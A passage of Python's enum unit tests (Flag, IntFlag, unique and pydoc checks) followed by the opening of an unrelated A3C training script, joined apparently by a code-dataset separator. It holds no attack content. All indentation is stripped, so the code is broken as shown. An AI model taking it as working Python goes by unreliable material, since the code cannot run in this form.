self.assertEqual(len(Perm), 3, Perm)
self.assertEqual(lst, [Perm.R, Perm.W, Perm.X])
for i, n in enumerate('R W X'.split()):
v = 1<<i
e = Perm(v)
self.assertEqual(e.value, v)
self.assertEqual(type(e.value), int)
self.assertEqual(e.name, n)
self.assertIn(e, Perm)
self.assertIs(type(e), Perm)
def test_programatic_function_string_with_start(self):
Perm = Flag('Perm', 'R W X', start=8)
lst = list(Perm)
self.assertEqual(len(lst), len(Perm))
self.assertEqual(len(Perm), 3, Perm)
self.assertEqual(lst, [Perm.R, Perm.W, Perm.X])
for i, n in enumerate('R W X'.split()):
v = 8<<i
e = Perm(v)
self.assertEqual(e.value, v)
self.assertEqual(type(e.value), int)
self.assertEqual(e.name, n)
self.assertIn(e, Perm)
self.assertIs(type(e), Perm)
def test_programatic_function_string_list(self):
Perm = Flag('Perm', ['R', 'W', 'X'])
lst = list(Perm)
self.assertEqual(len(lst), len(Perm))
self.assertEqual(len(Perm), 3, Perm)
self.assertEqual(lst, [Perm.R, Perm.W, Perm.X])
for i, n in enumerate('R W X'.split()):
v = 1<<i
e = Perm(v)
self.assertEqual(e.value, v)
self.assertEqual(type(e.value), int)
self.assertEqual(e.name, n)
self.assertIn(e, Perm)
self.assertIs(type(e), Perm)
def test_programatic_function_iterable(self):
Perm = Flag('Perm', (('R', 2), ('W', 8), ('X', 32)))
lst = list(Perm)
self.assertEqual(len(lst), len(Perm))
self.assertEqual(len(Perm), 3, Perm)
self.assertEqual(lst, [Perm.R, Perm.W, Perm.X])
for i, n in enumerate('R W X'.split()):
v = 1<<(2*i+1)
e = Perm(v)
self.assertEqual(e.value, v)
self.assertEqual(type(e.value), int)
self.assertEqual(e.name, n)
self.assertIn(e, Perm)
self.assertIs(type(e), Perm)
def test_programatic_function_from_dict(self):
Perm = Flag('Perm', OrderedDict((('R', 2), ('W', 8), ('X', 32))))
lst = list(Perm)
self.assertEqual(len(lst), len(Perm))
self.assertEqual(len(Perm), 3, Perm)
self.assertEqual(lst, [Perm.R, Perm.W, Perm.X])
for i, n in enumerate('R W X'.split()):
v = 1<<(2*i+1)
e = Perm(v)
self.assertEqual(e.value, v)
self.assertEqual(type(e.value), int)
self.assertEqual(e.name, n)
self.assertIn(e, Perm)
self.assertIs(type(e), Perm)
def test_pickle(self):
if isinstance(FlagStooges, Exception):
raise FlagStooges
test_pickle_dump_load(self.assertIs, FlagStooges.CURLY|FlagStooges.MOE)
test_pickle_dump_load(self.assertIs, FlagStooges)
def test_contains(self):
Open = self.Open
Color = self.Color
self.assertFalse(Color.BLACK in Open)
self.assertFalse(Open.RO in Color)
with self.assertRaises(TypeError):
'BLACK' in Color
with self.assertRaises(TypeError):
'RO' in Open
with self.assertRaises(TypeError):
1 in Color
with self.assertRaises(TypeError):
1 in Open
def test_member_contains(self):
Perm = self.Perm
R, W, X = Perm
RW = R | W
RX = R | X
WX = W | X
RWX = R | W | X
self.assertTrue(R in RW)
self.assertTrue(R in RX)
self.assertTrue(R in RWX)
self.assertTrue(W in RW)
self.assertTrue(W in WX)
self.assertTrue(W in RWX)
self.assertTrue(X in RX)
self.assertTrue(X in WX)
self.assertTrue(X in RWX)
self.assertFalse(R in WX)
self.assertFalse(W in RX)
self.assertFalse(X in RW)
def test_member_iter(self):
Color = self.Color
self.assertEqual(list(Color.PURPLE), [Color.BLUE, Color.RED])
self.assertEqual(list(Color.BLUE), [Color.BLUE])
self.assertEqual(list(Color.GREEN), [Color.GREEN])
def test_auto_number(self):
class Color(Flag):
red = auto()
blue = auto()
green = auto()
self.assertEqual(list(Color), [Color.red, Color.blue, Color.green])
self.assertEqual(Color.red.value, 1)
self.assertEqual(Color.blue.value, 2)
self.assertEqual(Color.green.value, 4)
def test_auto_number_garbage(self):
with self.assertRaisesRegex(TypeError, 'Invalid Flag value: .not an int.'):
class Color(Flag):
red = 'not an int'
blue = auto()
def test_cascading_failure(self):
class Bizarre(Flag):
c = 3
d = 4
f = 6
# Bizarre.c | Bizarre.d
name = "TestFlag.test_cascading_failure.<locals>.Bizarre"
self.assertRaisesRegex(ValueError, "5 is not a valid " + name, Bizarre, 5)
self.assertRaisesRegex(ValueError, "5 is not a valid " + name, Bizarre, 5)
self.assertRaisesRegex(ValueError, "2 is not a valid " + name, Bizarre, 2)
self.assertRaisesRegex(ValueError, "2 is not a valid " + name, Bizarre, 2)
self.assertRaisesRegex(ValueError, "1 is not a valid " + name, Bizarre, 1)
self.assertRaisesRegex(ValueError, "1 is not a valid " + name, Bizarre, 1)
def test_duplicate_auto(self):
class Dupes(Enum):
first = primero = auto()
second = auto()
third = auto()
self.assertEqual([Dupes.first, Dupes.second, Dupes.third], list(Dupes))
def test_bizarre(self):
class Bizarre(Flag):
b = 3
c = 4
d = 6
self.assertEqual(repr(Bizarre(7)), '<Bizarre.d|c|b: 7>')
def test_multiple_mixin(self):
class AllMixin:
@classproperty
def ALL(cls):
members = list(cls)
all_value = None
if members:
all_value = members[0]
for member in members[1:]:
all_value |= member
cls.ALL = all_value
return all_value
class StrMixin:
def __str__(self):
return self._name_.lower()
class Color(AllMixin, Flag):
RED = auto()
GREEN = auto()
BLUE = auto()
self.assertEqual(Color.RED.value, 1)
self.assertEqual(Color.GREEN.value, 2)
self.assertEqual(Color.BLUE.value, 4)
self.assertEqual(Color.ALL.value, 7)
self.assertEqual(str(Color.BLUE), 'Color.BLUE')
class Color(AllMixin, StrMixin, Flag):
RED = auto()
GREEN = auto()
BLUE = auto()
self.assertEqual(Color.RED.value, 1)
self.assertEqual(Color.GREEN.value, 2)
self.assertEqual(Color.BLUE.value, 4)
self.assertEqual(Color.ALL.value, 7)
self.assertEqual(str(Color.BLUE), 'blue')
class Color(StrMixin, AllMixin, Flag):
RED = auto()
GREEN = auto()
BLUE = auto()
self.assertEqual(Color.RED.value, 1)
self.assertEqual(Color.GREEN.value, 2)
self.assertEqual(Color.BLUE.value, 4)
self.assertEqual(Color.ALL.value, 7)
self.assertEqual(str(Color.BLUE), 'blue')
@threading_helper.reap_threads
def test_unique_composite(self):
# override __eq__ to be identity only
class TestFlag(Flag):
one = auto()
two = auto()
three = auto()
four = auto()
five = auto()
six = auto()
seven = auto()
eight = auto()
def __eq__(self, other):
return self is other
def __hash__(self):
return hash(self._value_)
# have multiple threads competing to complete the composite members
seen = set()
failed = False
def cycle_enum():
nonlocal failed
try:
for i in range(256):
seen.add(TestFlag(i))
except Exception:
failed = True
threads = [
threading.Thread(target=cycle_enum)
for _ in range(8)
]
with threading_helper.start_threads(threads):
pass
# check that only 248 members were created
self.assertFalse(
failed,
'at least one thread failed while creating composite members')
self.assertEqual(256, len(seen), 'too many composite members created')
def test_init_subclass(self):
class MyEnum(Flag):
def __init_subclass__(cls, **kwds):
super().__init_subclass__(**kwds)
self.assertFalse(cls.__dict__.get('_test', False))
cls._test1 = 'MyEnum'
#
class TheirEnum(MyEnum):
def __init_subclass__(cls, **kwds):
super(TheirEnum, cls).__init_subclass__(**kwds)
cls._test2 = 'TheirEnum'
class WhoseEnum(TheirEnum):
def __init_subclass__(cls, **kwds):
pass
class NoEnum(WhoseEnum):
ONE = 1
self.assertEqual(TheirEnum.__dict__['_test1'], 'MyEnum')
self.assertEqual(WhoseEnum.__dict__['_test1'], 'MyEnum')
self.assertEqual(WhoseEnum.__dict__['_test2'], 'TheirEnum')
self.assertFalse(NoEnum.__dict__.get('_test1', False))
self.assertFalse(NoEnum.__dict__.get('_test2', False))
#
class OurEnum(MyEnum):
def __init_subclass__(cls, **kwds):
cls._test2 = 'OurEnum'
class WhereEnum(OurEnum):
def __init_subclass__(cls, **kwds):
pass
class NeverEnum(WhereEnum):
ONE = 1
self.assertEqual(OurEnum.__dict__['_test1'], 'MyEnum')
self.assertFalse(WhereEnum.__dict__.get('_test1', False))
self.assertEqual(WhereEnum.__dict__['_test2'], 'OurEnum')
self.assertFalse(NeverEnum.__dict__.get('_test1', False))
self.assertFalse(NeverEnum.__dict__.get('_test2', False))
class TestIntFlag(unittest.TestCase):
"""Tests of the IntFlags."""
class Perm(IntFlag):
X = 1 << 0
W = 1 << 1
R = 1 << 2
class Open(IntFlag):
RO = 0
WO = 1
RW = 2
AC = 3
CE = 1<<19
class Color(IntFlag):
BLACK = 0
RED = 1
GREEN = 2
BLUE = 4
PURPLE = RED|BLUE
def test_type(self):
Perm = self.Perm
self.assertTrue(Perm._member_type_ is int)
Open = self.Open
for f in Perm:
self.assertTrue(isinstance(f, Perm))
self.assertEqual(f, f.value)
self.assertTrue(isinstance(Perm.W | Perm.X, Perm))
self.assertEqual(Perm.W | Perm.X, 3)
for f in Open:
self.assertTrue(isinstance(f, Open))
self.assertEqual(f, f.value)
self.assertTrue(isinstance(Open.WO | Open.RW, Open))
self.assertEqual(Open.WO | Open.RW, 3)
def test_str(self):
Perm = self.Perm
self.assertEqual(str(Perm.R), 'Perm.R')
self.assertEqual(str(Perm.W), 'Perm.W')
self.assertEqual(str(Perm.X), 'Perm.X')
self.assertEqual(str(Perm.R | Perm.W), 'Perm.R|W')
self.assertEqual(str(Perm.R | Perm.W | Perm.X), 'Perm.R|W|X')
self.assertEqual(str(Perm.R | 8), 'Perm.8|R')
self.assertEqual(str(Perm(0)), 'Perm.0')
self.assertEqual(str(Perm(8)), 'Perm.8')
self.assertEqual(str(~Perm.R), 'Perm.W|X')
self.assertEqual(str(~Perm.W), 'Perm.R|X')
self.assertEqual(str(~Perm.X), 'Perm.R|W')
self.assertEqual(str(~(Perm.R | Perm.W)), 'Perm.X')
self.assertEqual(str(~(Perm.R | Perm.W | Perm.X)), 'Perm.-8')
self.assertEqual(str(~(Perm.R | 8)), 'Perm.W|X')
self.assertEqual(str(Perm(~0)), 'Perm.R|W|X')
self.assertEqual(str(Perm(~8)), 'Perm.R|W|X')
Open = self.Open
self.assertEqual(str(Open.RO), 'Open.RO')
self.assertEqual(str(Open.WO), 'Open.WO')
self.assertEqual(str(Open.AC), 'Open.AC')
self.assertEqual(str(Open.RO | Open.CE), 'Open.CE')
self.assertEqual(str(Open.WO | Open.CE), 'Open.CE|WO')
self.assertEqual(str(Open(4)), 'Open.4')
self.assertEqual(str(~Open.RO), 'Open.CE|AC|RW|WO')
self.assertEqual(str(~Open.WO), 'Open.CE|RW')
self.assertEqual(str(~Open.AC), 'Open.CE')
self.assertEqual(str(~(Open.RO | Open.CE)), 'Open.AC|RW|WO')
self.assertEqual(str(~(Open.WO | Open.CE)), 'Open.RW')
self.assertEqual(str(Open(~4)), 'Open.CE|AC|RW|WO')
def test_repr(self):
Perm = self.Perm
self.assertEqual(repr(Perm.R), '<Perm.R: 4>')
self.assertEqual(repr(Perm.W), '<Perm.W: 2>')
self.assertEqual(repr(Perm.X), '<Perm.X: 1>')
self.assertEqual(repr(Perm.R | Perm.W), '<Perm.R|W: 6>')
self.assertEqual(repr(Perm.R | Perm.W | Perm.X), '<Perm.R|W|X: 7>')
self.assertEqual(repr(Perm.R | 8), '<Perm.8|R: 12>')
self.assertEqual(repr(Perm(0)), '<Perm.0: 0>')
self.assertEqual(repr(Perm(8)), '<Perm.8: 8>')
self.assertEqual(repr(~Perm.R), '<Perm.W|X: -5>')
self.assertEqual(repr(~Perm.W), '<Perm.R|X: -3>')
self.assertEqual(repr(~Perm.X), '<Perm.R|W: -2>')
self.assertEqual(repr(~(Perm.R | Perm.W)), '<Perm.X: -7>')
self.assertEqual(repr(~(Perm.R | Perm.W | Perm.X)), '<Perm.-8: -8>')
self.assertEqual(repr(~(Perm.R | 8)), '<Perm.W|X: -13>')
self.assertEqual(repr(Perm(~0)), '<Perm.R|W|X: -1>')
self.assertEqual(repr(Perm(~8)), '<Perm.R|W|X: -9>')
Open = self.Open
self.assertEqual(repr(Open.RO), '<Open.RO: 0>')
self.assertEqual(repr(Open.WO), '<Open.WO: 1>')
self.assertEqual(repr(Open.AC), '<Open.AC: 3>')
self.assertEqual(repr(Open.RO | Open.CE), '<Open.CE: 524288>')
self.assertEqual(repr(Open.WO | Open.CE), '<Open.CE|WO: 524289>')
self.assertEqual(repr(Open(4)), '<Open.4: 4>')
self.assertEqual(repr(~Open.RO), '<Open.CE|AC|RW|WO: -1>')
self.assertEqual(repr(~Open.WO), '<Open.CE|RW: -2>')
self.assertEqual(repr(~Open.AC), '<Open.CE: -4>')
self.assertEqual(repr(~(Open.RO | Open.CE)), '<Open.AC|RW|WO: -524289>')
self.assertEqual(repr(~(Open.WO | Open.CE)), '<Open.RW: -524290>')
self.assertEqual(repr(Open(~4)), '<Open.CE|AC|RW|WO: -5>')
def test_format(self):
Perm = self.Perm
self.assertEqual(format(Perm.R, ''), '4')
self.assertEqual(format(Perm.R | Perm.X, ''), '5')
def test_or(self):
Perm = self.Perm
for i in Perm:
for j in Perm:
self.assertEqual(i | j, i.value | j.value)
self.assertEqual((i | j).value, i.value | j.value)
self.assertIs(type(i | j), Perm)
for j in range(8):
self.assertEqual(i | j, i.value | j)
self.assertEqual((i | j).value, i.value | j)
self.assertIs(type(i | j), Perm)
self.assertEqual(j | i, j | i.value)
self.assertEqual((j | i).value, j | i.value)
self.assertIs(type(j | i), Perm)
for i in Perm:
self.assertIs(i | i, i)
self.assertIs(i | 0, i)
self.assertIs(0 | i, i)
Open = self.Open
self.assertIs(Open.RO | Open.CE, Open.CE)
def test_and(self):
Perm = self.Perm
RW = Perm.R | Perm.W
RX = Perm.R | Perm.X
WX = Perm.W | Perm.X
RWX = Perm.R | Perm.W | Perm.X
values = list(Perm) + [RW, RX, WX, RWX, Perm(0)]
for i in values:
for j in values:
self.assertEqual(i & j, i.value & j.value, 'i is %r, j is %r' % (i, j))
self.assertEqual((i & j).value, i.value & j.value, 'i is %r, j is %r' % (i, j))
self.assertIs(type(i & j), Perm, 'i is %r, j is %r' % (i, j))
for j in range(8):
self.assertEqual(i & j, i.value & j)
self.assertEqual((i & j).value, i.value & j)
self.assertIs(type(i & j), Perm)
self.assertEqual(j & i, j & i.value)
self.assertEqual((j & i).value, j & i.value)
self.assertIs(type(j & i), Perm)
for i in Perm:
self.assertIs(i & i, i)
self.assertIs(i & 7, i)
self.assertIs(7 & i, i)
Open = self.Open
self.assertIs(Open.RO & Open.CE, Open.RO)
def test_xor(self):
Perm = self.Perm
for i in Perm:
for j in Perm:
self.assertEqual(i ^ j, i.value ^ j.value)
self.assertEqual((i ^ j).value, i.value ^ j.value)
self.assertIs(type(i ^ j), Perm)
for j in range(8):
self.assertEqual(i ^ j, i.value ^ j)
self.assertEqual((i ^ j).value, i.value ^ j)
self.assertIs(type(i ^ j), Perm)
self.assertEqual(j ^ i, j ^ i.value)
self.assertEqual((j ^ i).value, j ^ i.value)
self.assertIs(type(j ^ i), Perm)
for i in Perm:
self.assertIs(i ^ 0, i)
self.assertIs(0 ^ i, i)
Open = self.Open
self.assertIs(Open.RO ^ Open.CE, Open.CE)
self.assertIs(Open.CE ^ Open.CE, Open.RO)
def test_invert(self):
Perm = self.Perm
RW = Perm.R | Perm.W
RX = Perm.R | Perm.X
WX = Perm.W | Perm.X
RWX = Perm.R | Perm.W | Perm.X
values = list(Perm) + [RW, RX, WX, RWX, Perm(0)]
for i in values:
self.assertEqual(~i, ~i.value)
self.assertEqual((~i).value, ~i.value)
self.assertIs(type(~i), Perm)
self.assertEqual(~~i, i)
for i in Perm:
self.assertIs(~~i, i)
Open = self.Open
self.assertIs(Open.WO & ~Open.WO, Open.RO)
self.assertIs((Open.WO|Open.CE) & ~Open.WO, Open.CE)
def test_programatic_function_string(self):
Perm = IntFlag('Perm', 'R W X')
lst = list(Perm)
self.assertEqual(len(lst), len(Perm))
self.assertEqual(len(Perm), 3, Perm)
self.assertEqual(lst, [Perm.R, Perm.W, Perm.X])
for i, n in enumerate('R W X'.split()):
v = 1<<i
e = Perm(v)
self.assertEqual(e.value, v)
self.assertEqual(type(e.value), int)
self.assertEqual(e, v)
self.assertEqual(e.name, n)
self.assertIn(e, Perm)
self.assertIs(type(e), Perm)
def test_programatic_function_string_with_start(self):
Perm = IntFlag('Perm', 'R W X', start=8)
lst = list(Perm)
self.assertEqual(len(lst), len(Perm))
self.assertEqual(len(Perm), 3, Perm)
self.assertEqual(lst, [Perm.R, Perm.W, Perm.X])
for i, n in enumerate('R W X'.split()):
v = 8<<i
e = Perm(v)
self.assertEqual(e.value, v)
self.assertEqual(type(e.value), int)
self.assertEqual(e, v)
self.assertEqual(e.name, n)
self.assertIn(e, Perm)
self.assertIs(type(e), Perm)
def test_programatic_function_string_list(self):
Perm = IntFlag('Perm', ['R', 'W', 'X'])
lst = list(Perm)
self.assertEqual(len(lst), len(Perm))
self.assertEqual(len(Perm), 3, Perm)
self.assertEqual(lst, [Perm.R, Perm.W, Perm.X])
for i, n in enumerate('R W X'.split()):
v = 1<<i
e = Perm(v)
self.assertEqual(e.value, v)
self.assertEqual(type(e.value), int)
self.assertEqual(e, v)
self.assertEqual(e.name, n)
self.assertIn(e, Perm)
self.assertIs(type(e), Perm)
def test_programatic_function_iterable(self):
Perm = IntFlag('Perm', (('R', 2), ('W', 8), ('X', 32)))
lst = list(Perm)
self.assertEqual(len(lst), len(Perm))
self.assertEqual(len(Perm), 3, Perm)
self.assertEqual(lst, [Perm.R, Perm.W, Perm.X])
for i, n in enumerate('R W X'.split()):
v = 1<<(2*i+1)
e = Perm(v)
self.assertEqual(e.value, v)
self.assertEqual(type(e.value), int)
self.assertEqual(e, v)
self.assertEqual(e.name, n)
self.assertIn(e, Perm)
self.assertIs(type(e), Perm)
def test_programatic_function_from_dict(self):
Perm = IntFlag('Perm', OrderedDict((('R', 2), ('W', 8), ('X', 32))))
lst = list(Perm)
self.assertEqual(len(lst), len(Perm))
self.assertEqual(len(Perm), 3, Perm)
self.assertEqual(lst, [Perm.R, Perm.W, Perm.X])
for i, n in enumerate('R W X'.split()):
v = 1<<(2*i+1)
e = Perm(v)
self.assertEqual(e.value, v)
self.assertEqual(type(e.value), int)
self.assertEqual(e, v)
self.assertEqual(e.name, n)
self.assertIn(e, Perm)
self.assertIs(type(e), Perm)
def test_programatic_function_from_empty_list(self):
Perm = enum.IntFlag('Perm', [])
lst = list(Perm)
self.assertEqual(len(lst), len(Perm))
self.assertEqual(len(Perm), 0, Perm)
Thing = enum.Enum('Thing', [])
lst = list(Thing)
self.assertEqual(len(lst), len(Thing))
self.assertEqual(len(Thing), 0, Thing)
def test_programatic_function_from_empty_tuple(self):
Perm = enum.IntFlag('Perm', ())
lst = list(Perm)
self.assertEqual(len(lst), len(Perm))
self.assertEqual(len(Perm), 0, Perm)
Thing = enum.Enum('Thing', ())
self.assertEqual(len(lst), len(Thing))
self.assertEqual(len(Thing), 0, Thing)
def test_contains(self):
Open = self.Open
Color = self.Color
self.assertTrue(Color.GREEN in Color)
self.assertTrue(Open.RW in Open)
self.assertFalse(Color.GREEN in Open)
self.assertFalse(Open.RW in Color)
with self.assertRaises(TypeError):
'GREEN' in Color
with self.assertRaises(TypeError):
'RW' in Open
with self.assertRaises(TypeError):
2 in Color
with self.assertRaises(TypeError):
2 in Open
def test_member_contains(self):
Perm = self.Perm
R, W, X = Perm
RW = R | W
RX = R | X
WX = W | X
RWX = R | W | X
self.assertTrue(R in RW)
self.assertTrue(R in RX)
self.assertTrue(R in RWX)
self.assertTrue(W in RW)
self.assertTrue(W in WX)
self.assertTrue(W in RWX)
self.assertTrue(X in RX)
self.assertTrue(X in WX)
self.assertTrue(X in RWX)
self.assertFalse(R in WX)
self.assertFalse(W in RX)
self.assertFalse(X in RW)
with self.assertRaises(TypeError):
self.assertFalse('test' in RW)
def test_member_iter(self):
Color = self.Color
self.assertEqual(list(Color.PURPLE), [Color.BLUE, Color.RED])
self.assertEqual(list(Color.BLUE), [Color.BLUE])
self.assertEqual(list(Color.GREEN), [Color.GREEN])
def test_bool(self):
Perm = self.Perm
for f in Perm:
self.assertTrue(f)
Open = self.Open
for f in Open:
self.assertEqual(bool(f.value), bool(f))
def test_multiple_mixin(self):
class AllMixin:
@classproperty
def ALL(cls):
members = list(cls)
all_value = None
if members:
all_value = members[0]
for member in members[1:]:
all_value |= member
cls.ALL = all_value
return all_value
class StrMixin:
def __str__(self):
return self._name_.lower()
class Color(AllMixin, IntFlag):
RED = auto()
GREEN = auto()
BLUE = auto()
self.assertEqual(Color.RED.value, 1)
self.assertEqual(Color.GREEN.value, 2)
self.assertEqual(Color.BLUE.value, 4)
self.assertEqual(Color.ALL.value, 7)
self.assertEqual(str(Color.BLUE), 'Color.BLUE')
class Color(AllMixin, StrMixin, IntFlag):
RED = auto()
GREEN = auto()
BLUE = auto()
self.assertEqual(Color.RED.value, 1)
self.assertEqual(Color.GREEN.value, 2)
self.assertEqual(Color.BLUE.value, 4)
self.assertEqual(Color.ALL.value, 7)
self.assertEqual(str(Color.BLUE), 'blue')
class Color(StrMixin, AllMixin, IntFlag):
RED = auto()
GREEN = auto()
BLUE = auto()
self.assertEqual(Color.RED.value, 1)
self.assertEqual(Color.GREEN.value, 2)
self.assertEqual(Color.BLUE.value, 4)
self.assertEqual(Color.ALL.value, 7)
self.assertEqual(str(Color.BLUE), 'blue')
@threading_helper.reap_threads
def test_unique_composite(self):
# override __eq__ to be identity only
class TestFlag(IntFlag):
one = auto()
two = auto()
three = auto()
four = auto()
five = auto()
six = auto()
seven = auto()
eight = auto()
def __eq__(self, other):
return self is other
def __hash__(self):
return hash(self._value_)
# have multiple threads competing to complete the composite members
seen = set()
failed = False
def cycle_enum():
nonlocal failed
try:
for i in range(256):
seen.add(TestFlag(i))
except Exception:
failed = True
threads = [
threading.Thread(target=cycle_enum)
for _ in range(8)
]
with threading_helper.start_threads(threads):
pass
# check that only 248 members were created
self.assertFalse(
failed,
'at least one thread failed while creating composite members')
self.assertEqual(256, len(seen), 'too many composite members created')
class TestEmptyAndNonLatinStrings(unittest.TestCase):
def test_empty_string(self):
with self.assertRaises(ValueError):
empty_abc = Enum('empty_abc', ('', 'B', 'C'))
def test_non_latin_character_string(self):
greek_abc = Enum('greek_abc', ('\u03B1', 'B', 'C'))
item = getattr(greek_abc, '\u03B1')
self.assertEqual(item.value, 1)
def test_non_latin_number_string(self):
hebrew_123 = Enum('hebrew_123', ('\u05D0', '2', '3'))
item = getattr(hebrew_123, '\u05D0')
self.assertEqual(item.value, 1)
class TestUnique(unittest.TestCase):
def test_unique_clean(self):
@unique
class Clean(Enum):
one = 1
two = 'dos'
tres = 4.0
@unique
class Cleaner(IntEnum):
single = 1
double = 2
triple = 3
def test_unique_dirty(self):
with self.assertRaisesRegex(ValueError, 'tres.*one'):
@unique
class Dirty(Enum):
one = 1
two = 'dos'
tres = 1
with self.assertRaisesRegex(
ValueError,
'double.*single.*turkey.*triple',
):
@unique
class Dirtier(IntEnum):
single = 1
double = 1
triple = 3
turkey = 3
def test_unique_with_name(self):
@unique
class Silly(Enum):
one = 1
two = 'dos'
name = 3
@unique
class Sillier(IntEnum):
single = 1
name = 2
triple = 3
value = 4
expected_help_output_with_docs = """\
Help on class Color in module %s:
class Color(enum.Enum)
| Color(value, names=None, *, module=None, qualname=None, type=None, start=1)
|\x20\x20
| An enumeration.
|\x20\x20
| Method resolution order:
| Color
| enum.Enum
| builtins.object
|\x20\x20
| Data and other attributes defined here:
|\x20\x20
| blue = <Color.blue: 3>
|\x20\x20
| green = <Color.green: 2>
|\x20\x20
| red = <Color.red: 1>
|\x20\x20
| ----------------------------------------------------------------------
| Data descriptors inherited from enum.Enum:
|\x20\x20
| name
| The name of the Enum member.
|\x20\x20
| value
| The value of the Enum member.
|\x20\x20
| ----------------------------------------------------------------------
| Readonly properties inherited from enum.EnumMeta:
|\x20\x20
| __members__
| Returns a mapping of member name->value.
|\x20\x20\x20\x20\x20\x20
| This mapping lists all enum members, including aliases. Note that this
| is a read-only view of the internal mapping."""
expected_help_output_without_docs = """\
Help on class Color in module %s:
class Color(enum.Enum)
| Color(value, names=None, *, module=None, qualname=None, type=None, start=1)
|\x20\x20
| Method resolution order:
| Color
| enum.Enum
| builtins.object
|\x20\x20
| Data and other attributes defined here:
|\x20\x20
| blue = <Color.blue: 3>
|\x20\x20
| green = <Color.green: 2>
|\x20\x20
| red = <Color.red: 1>
|\x20\x20
| ----------------------------------------------------------------------
| Data descriptors inherited from enum.Enum:
|\x20\x20
| name
|\x20\x20
| value
|\x20\x20
| ----------------------------------------------------------------------
| Data descriptors inherited from enum.EnumMeta:
|\x20\x20
| __members__"""
class TestStdLib(unittest.TestCase):
maxDiff = None
class Color(Enum):
red = 1
green = 2
blue = 3
def test_pydoc(self):
# indirectly test __objclass__
if StrEnum.__doc__ is None:
expected_text = expected_help_output_without_docs % __name__
else:
expected_text = expected_help_output_with_docs % __name__
output = StringIO()
helper = pydoc.Helper(output=output)
helper(self.Color)
result = output.getvalue().strip()
self.assertEqual(result, expected_text)
def test_inspect_getmembers(self):
values = dict((
('__class__', EnumMeta),
('__doc__', 'An enumeration.'),
('__members__', self.Color.__members__),
('__module__', __name__),
('blue', self.Color.blue),
('green', self.Color.green),
('name', Enum.__dict__['name']),
('red', self.Color.red),
('value', Enum.__dict__['value']),
))
result = dict(inspect.getmembers(self.Color))
self.assertEqual(values.keys(), result.keys())
failed = False
for k in values.keys():
if result[k] != values[k]:
print()
print('\n%s\n key: %s\n result: %s\nexpected: %s\n%s\n' %
('=' * 75, k, result[k], values[k], '=' * 75), sep='')
failed = True
if failed:
self.fail("result does not equal expected, see print above")
def test_inspect_classify_class_attrs(self):
# indirectly test __objclass__
from inspect import Attribute
values = [
Attribute(name='__class__', kind='data',
defining_class=object, object=EnumMeta),
Attribute(name='__doc__', kind='data',
defining_class=self.Color, object='An enumeration.'),
Attribute(name='__members__', kind='property',
defining_class=EnumMeta, object=EnumMeta.__members__),
Attribute(name='__module__', kind='data',
defining_class=self.Color, object=__name__),
Attribute(name='blue', kind='data',
defining_class=self.Color, object=self.Color.blue),
Attribute(name='green', kind='data',
defining_class=self.Color, object=self.Color.green),
Attribute(name='red', kind='data',
defining_class=self.Color, object=self.Color.red),
Attribute(name='name', kind='data',
defining_class=Enum, object=Enum.__dict__['name']),
Attribute(name='value', kind='data',
defining_class=Enum, object=Enum.__dict__['value']),
]
values.sort(key=lambda item: item.name)
result = list(inspect.classify_class_attrs(self.Color))
result.sort(key=lambda item: item.name)
failed = False
for v, r in zip(values, result):
if r != v:
print('\n%s\n%s\n%s\n%s\n' % ('=' * 75, r, v, '=' * 75), sep='')
failed = True
if failed:
self.fail("result does not equal expected, see print above")
class MiscTestCase(unittest.TestCase):
def test__all__(self):
support.check__all__(self, enum)
# These are unordered here on purpose to ensure that declaration order
# makes no difference.
CONVERT_TEST_NAME_D = 5
CONVERT_TEST_NAME_C = 5
CONVERT_TEST_NAME_B = 5
CONVERT_TEST_NAME_A = 5 # This one should sort first.
CONVERT_TEST_NAME_E = 5
CONVERT_TEST_NAME_F = 5
class TestIntEnumConvert(unittest.TestCase):
def test_convert_value_lookup_priority(self):
test_type = enum.IntEnum._convert_(
'UnittestConvert',
('test.test_enum', '__main__')[__name__=='__main__'],
filter=lambda x: x.startswith('CONVERT_TEST_'))
# We don't want the reverse lookup value to vary when there are
# multiple possible names for a given value. It should always
# report the first lexigraphical name in that case.
self.assertEqual(test_type(5).name, 'CONVERT_TEST_NAME_A')
def test_convert(self):
test_type = enum.IntEnum._convert_(
'UnittestConvert',
('test.test_enum', '__main__')[__name__=='__main__'],
filter=lambda x: x.startswith('CONVERT_TEST_'))
# Ensure that test_type has all of the desired names and values.
self.assertEqual(test_type.CONVERT_TEST_NAME_F,
test_type.CONVERT_TEST_NAME_A)
self.assertEqual(test_type.CONVERT_TEST_NAME_B, 5)
self.assertEqual(test_type.CONVERT_TEST_NAME_C, 5)
self.assertEqual(test_type.CONVERT_TEST_NAME_D, 5)
self.assertEqual(test_type.CONVERT_TEST_NAME_E, 5)
# Ensure that test_type only picked up names matching the filter.
self.assertEqual([name for name in dir(test_type)
if name[0:2] not in ('CO', '__')],
[], msg='Names other than CONVERT_TEST_* found.')
@unittest.skipUnless(sys.version_info[:2] == (3, 8),
'_convert was deprecated in 3.8')
def test_convert_warn(self):
with self.assertWarns(DeprecationWarning):
enum.IntEnum._convert(
'UnittestConvert',
('test.test_enum', '__main__')[__name__=='__main__'],
filter=lambda x: x.startswith('CONVERT_TEST_'))
@unittest.skipUnless(sys.version_info >= (3, 9),
'_convert was removed in 3.9')
def test_convert_raise(self):
with self.assertRaises(AttributeError):
enum.IntEnum._convert(
'UnittestConvert',
('test.test_enum', '__main__')[__name__=='__main__'],
filter=lambda x: x.startswith('CONVERT_TEST_'))
if __name__ == '__main__':
unittest.main()
|
main.py
|
from __future__ import print_function
import argparse
import os
import torch
import torch.multiprocessing as mp
import my_optim
from envs import create_atari_env
from network import ActorCriticFFNetwork
from test import test
from train import train
from constants import RMSP_EPSILON
from constants import RMSP_ALPHA
from constants import GAMMA
from constants import ENTROPY_BETA
from constants import GRAD_NORM_CLIP
from constants import TASK_LIST
from constants import ACTION_SIZE
from constants import MAX_TIME_STEP
from constants import CHECKPOINT_DIR
# Credit
# https://github.com/ikostrikov/pytorch-a3c
# Based on
# https://github.com/pytorch/examples/tree/master/mnist_hogwild
# Training settings
parser = argparse.ArgumentParser(description='A3C')
parser.add_argument('--lr', type=float, default=0.0007,
help='learning rate (default: 0.0007)')
parser.add_argument('--gamma', type=float, default=GAMMA,
help='discount factor for rewards (default: 0.99)')
parser.add_argument('--alpha', type=float, default=RMSP_ALPHA,
help='discount factor for rewards (default: 0.99)')
parser.add_argument('--eps', type=float, default=RMSP_EPSILON,
help='discount factor for rewards (default: 0.99)')
parser.add_argument('--tau', type=float, default=1.00,
help='parameter for GAE (default: 1.00)')
parser.add_argument('--entropy-coef', type=float, default=ENTROPY_BETA,
